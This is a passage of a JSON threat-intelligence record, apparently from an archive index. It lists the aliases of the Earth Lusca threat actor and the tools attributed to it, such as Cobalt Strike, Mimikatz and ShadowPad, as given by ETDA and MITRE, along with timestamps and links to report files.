"aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439148, "ts_updated_at": 1775826723, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f0163a40d10de6ebe7169543e45e67af2d6a621f.pdf", "text": "https://archive.orkl.eu/f0163a40d10de6ebe7169543e45e67af2d6a621f.txt", "img": "https://archive.orkl.eu/f0163a40d10de6ebe7169543e45e67af2d6a621f.jpg" } }